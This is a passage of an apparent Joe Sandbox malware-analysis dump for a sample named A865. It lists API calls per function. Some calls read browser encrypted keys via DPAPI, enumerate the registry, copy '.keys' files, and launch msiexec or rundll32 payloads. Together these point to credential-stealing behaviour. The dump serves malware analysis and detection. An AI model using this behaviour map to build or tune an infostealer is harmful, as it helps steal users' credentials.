                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00879330,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                                                            • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                                                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                                                            • StrStrA.SHLWAPI(?,00879378,00420B52), ref: 0040CAF7
                                                            • StrStrA.SHLWAPI(00000000,00879630), ref: 0040CB1E
                                                            • StrStrA.SHLWAPI(?,00879C18,00000000,?,00421458,00000000,?,00000000,00000000,?,008761C0,00000000,?,00421454,00000000,?), ref: 0040CCA2
                                                            • StrStrA.SHLWAPI(00000000,00879878), ref: 0040CCB9
                                                              • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                                                              • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,008761F0), ref: 0040C871
                                                              • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                                              • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                                                            • StrStrA.SHLWAPI(?,00879878,00000000,?,0042145C,00000000,?,00000000,008761F0), ref: 0040CD5A
                                                            • StrStrA.SHLWAPI(00000000,00876150), ref: 0040CD71
                                                              • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                                              • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                                              • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                                            • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                                                            • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                                            • String ID:
                                                            • API String ID: 3555725114-3916222277
                                                            • Opcode ID: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                                            • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                                                            • Opcode Fuzzy Hash: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                                            • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                                                            APIs
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                              • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                                              • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 022DCCD3
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 022DCCF0
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 022DCCFC
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 022DCD0F
                                                            • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 022DCD1C
                                                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 022DCD40
                                                            • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 022DCD5E
                                                            • StrStrA.SHLWAPI(00000000,0064A364), ref: 022DCD85
                                                            • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 022DCF09
                                                            • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 022DCF20
                                                              • Part of subcall function 022DCA87: memset.MSVCRT ref: 022DCABA
                                                              • Part of subcall function 022DCA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 022DCAD8
                                                              • Part of subcall function 022DCA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 022DCAE3
                                                              • Part of subcall function 022DCA87: memcpy.MSVCRT(?,?,?), ref: 022DCB79
                                                            • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 022DCFC1
                                                            • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 022DCFD8
                                                              • Part of subcall function 022DCA87: lstrcat.KERNEL32(?,00420B46), ref: 022DCBAA
                                                              • Part of subcall function 022DCA87: lstrcat.KERNEL32(?,00420B47), ref: 022DCBBE
                                                              • Part of subcall function 022DCA87: lstrcat.KERNEL32(?,00420B4E), ref: 022DCBDF
                                                            • lstrlen.KERNEL32(00000000), ref: 022DD0AB
                                                            • CloseHandle.KERNEL32(00000000), ref: 022DD103
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                                            • String ID:
                                                            • API String ID: 3555725114-3916222277
                                                            • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                                            • Instruction ID: 7a30f4c0399331f6f53a97a7d2ae2789a9cc34d3b0ed18b9c76773a63c979b17
                                                            • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                                            • Instruction Fuzzy Hash: 64E1EC76920308ABCF14EBE4DD95EEEB77AAF64300F404159F107A6194EF346A89DF60
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            • RegOpenKeyExA.ADVAPI32(00000000,00877378,00000000,00020019,00000000,004205B6), ref: 004183A4
                                                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                                            • wsprintfA.USER32 ref: 00418459
                                                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                            • String ID: - $%s\%s$?
                                                            • API String ID: 3246050789-3278919252
                                                            • Opcode ID: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                                            • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                                                            • Opcode Fuzzy Hash: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                                            • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            • memset.MSVCRT ref: 00410C1C
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                            • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                            • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                                            • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                                            • lstrlenA.KERNEL32(?), ref: 00410CA7
                                                            • memset.MSVCRT ref: 00410CCD
                                                            • memset.MSVCRT ref: 00410CE1
                                                              • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00876340,?,0042110C,?,00000000), ref: 0041A82B
                                                              • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                              • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00845370,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                              • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                            • String ID: .exe
                                                            • API String ID: 1395395982-4119554291
                                                            • Opcode ID: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                                            • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                                            • Opcode Fuzzy Hash: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                                            • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                                                            APIs
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateGlobalStream
                                                            • String ID: image/jpeg
                                                            • API String ID: 2244384528-3785015651
                                                            • Opcode ID: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                                            • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                                                            • Opcode Fuzzy Hash: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                                            • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                                                            APIs
                                                            • strtok_s.MSVCRT ref: 00411307
                                                            • strtok_s.MSVCRT ref: 00411750
                                                              • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00876340,?,0042110C,?,00000000), ref: 0041A82B
                                                              • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: strtok_s$lstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 348468850-0
                                                            • Opcode ID: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                                            • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                                                            • Opcode Fuzzy Hash: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                                            • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExecuteShell$lstrcpy
                                                            • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                                            • API String ID: 2507796910-3625054190
                                                            • Opcode ID: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                                            • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                                                            • Opcode Fuzzy Hash: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                                            • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                                                            APIs
                                                            • memset.MSVCRT ref: 0041429E
                                                            • memset.MSVCRT ref: 004142B5
                                                              • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                                                            • lstrcatA.KERNEL32(?,008790D8), ref: 0041430B
                                                            • lstrcatA.KERNEL32(?,?), ref: 0041431F
                                                            • lstrcatA.KERNEL32(?,00879738), ref: 00414333
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                                              • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                                              • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                              • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                              • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                              • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                              • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                              • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                              • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                              • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                                                            • StrStrA.SHLWAPI(?,0087A7D0), ref: 004143F3
                                                            • GlobalFree.KERNEL32(?), ref: 00414512
                                                              • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                              • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                              • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                              • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                              • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                                                            • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                                                            • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                                                            • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                                                            • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                            • String ID:
                                                            • API String ID: 1191620704-0
                                                            • Opcode ID: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                                            • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                                                            • Opcode Fuzzy Hash: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                                            • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                                                            APIs
                                                            • memset.MSVCRT ref: 022E4505
                                                            • memset.MSVCRT ref: 022E451C
                                                              • Part of subcall function 022E9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022E9072
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E4553
                                                            • lstrcat.KERNEL32(?,0064A30C), ref: 022E4572
                                                            • lstrcat.KERNEL32(?,?), ref: 022E4586
                                                            • lstrcat.KERNEL32(?,0064A5D8), ref: 022E459A
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                              • Part of subcall function 022E8FF7: GetFileAttributesA.KERNEL32(00000000,?,022D1DBB,?,?,0042565C,?,?,00420E1F), ref: 022E9006
                                                              • Part of subcall function 022D9F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 022D9FA0
                                                              • Part of subcall function 022D9F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 022D9FF9
                                                              • Part of subcall function 022D9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022D9C53
                                                              • Part of subcall function 022D9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022D9C78
                                                              • Part of subcall function 022D9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022D9C98
                                                              • Part of subcall function 022D9C27: ReadFile.KERNEL32(000000FF,?,00000000,022D16F6,00000000), ref: 022D9CC1
                                                              • Part of subcall function 022D9C27: LocalFree.KERNEL32(022D16F6), ref: 022D9CF7
                                                              • Part of subcall function 022D9C27: CloseHandle.KERNEL32(000000FF), ref: 022D9D01
                                                              • Part of subcall function 022E9627: GlobalAlloc.KERNEL32(00000000,022E4644,022E4644), ref: 022E963A
                                                            • StrStrA.SHLWAPI(?,0064A0D8), ref: 022E465A
                                                            • GlobalFree.KERNEL32(?), ref: 022E4779
                                                              • Part of subcall function 022D9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022D5155,00000000,00000000), ref: 022D9D56
                                                              • Part of subcall function 022D9D27: LocalAlloc.KERNEL32(00000040,?,?,?,022D5155,00000000,?), ref: 022D9D68
                                                              • Part of subcall function 022D9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022D5155,00000000,00000000), ref: 022D9D91
                                                              • Part of subcall function 022D9D27: LocalFree.KERNEL32(?,?,?,?,022D5155,00000000,?), ref: 022D9DA6
                                                              • Part of subcall function 022DA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022DA094
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E470A
                                                            • StrCmpCA.SHLWAPI(?,004208D1), ref: 022E4727
                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 022E4739
                                                            • lstrcat.KERNEL32(00000000,?), ref: 022E474C
                                                            • lstrcat.KERNEL32(00000000,00420FB8), ref: 022E475B
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                            • String ID:
                                                            • API String ID: 1191620704-0
                                                            • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                                            • Instruction ID: 9f76b99db6c1d1b8667cebf9b2c3c177e82e0d579a2785da4de87d1280749433
                                                            • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                                            • Instruction Fuzzy Hash: 047151B6910218BBDF14FBE0DC89FEE737AAB49300F408598E60696184EB75D748CF91
                                                            APIs
                                                            • memset.MSVCRT ref: 00401327
                                                              • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                              • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                              • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                              • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                              • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                                            • lstrlenA.KERNEL32(?), ref: 0040135C
                                                            • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                              • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00845370,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                              • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                              • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                              • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                              • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                              • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
